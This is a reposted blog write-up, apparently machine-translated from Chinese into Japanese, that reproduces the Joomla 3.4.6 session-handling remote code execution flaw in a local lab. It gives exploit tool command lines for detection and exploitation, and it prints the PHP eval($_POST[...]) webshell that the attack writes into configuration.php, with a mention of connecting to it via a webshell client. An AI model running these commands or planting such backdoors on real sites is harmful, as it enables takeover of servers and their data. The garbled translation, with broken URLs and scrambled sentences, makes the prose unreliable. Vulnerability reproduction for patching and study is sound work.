Joomlaの3.4.6、リモートでコードが実行される脆弱性分析再現性

CMS導入は0x00

Joomla!のは、世界的に有名なコンテンツ管理システムです。Joomla!のPHP言語に加えて開発した、MySQLデータベース・ソフトウェア・システムを使用して、最新バージョンは3.9.11です。これは、異なる様々なプラットフォームのLinux、Windowsの、MacOSXの上と上のように実行することができます。現在、世界中のオープンソース物質によってすべてのオープンソース開発とサポート体制、この組織のメンバーを実施し、開発者、設計者、システム管理者、文書の作成者を含む約150人のグループのメンバー、および2つ以上1万メンバーが参加。
2012年以来、表彰式が始まった、長年のJoomla CMSの賞はチャンピオンになるために。2015、2016、2017、2018年のグローバル評価でCMSに続き、再び「ベストオープンソースCMS」賞を受賞しました!

0x01の脆弱性プロファイル

  • アレッサンドロGroppo @Hacktiveセキュリティを悪用し、デシベル(https://www.exploit-db.com/exploits/47465)で実行したコマンドEXP Joomlaの2019年10月2日にリリースされ、本質的に誤った取り扱いJoomlaのセッションデータのための抜け穴であります不正な攻撃者は、許可サーバ、リモートコマンド実行を得るために、悪意のある細工されたHTTPリクエストを送信することができます。
  • 効果範囲:3.0.0 <= Joomlaの<= 3.4.6

ビルドに0x02の環境

私はphpstudyビルドを使用
//downloads.joomla.org/it/cms/joomla3/3-4-6ます。https:Joomlaのダウンロードを
正常にインストール、次のホームの後
ここに画像を挿入説明

0x03の再現性のある脆弱性

EXP:HTTPS://github.com/kiks7/rusty_joomla_rce
1.脆弱性の検出

python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c

結果は以下のとおりで、脆弱な証拠抜け穴があるされている
ここに画像を挿入説明
2エクスプロイト

rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80

ここに画像を挿入説明
Configuration.phpは、書かれた言葉トロイの木馬(ここで私はいくつかありますが、数回以上実行)で見ることができます
ここに画像を挿入説明

if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);

包丁との接続
ここに画像を挿入説明

0x04のバグ修正

公式サイトの最新バージョンへのアップデート

0x05のリファレンス

https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg

おすすめ

転載: www.cnblogs.com/0nc3/p/12071266.html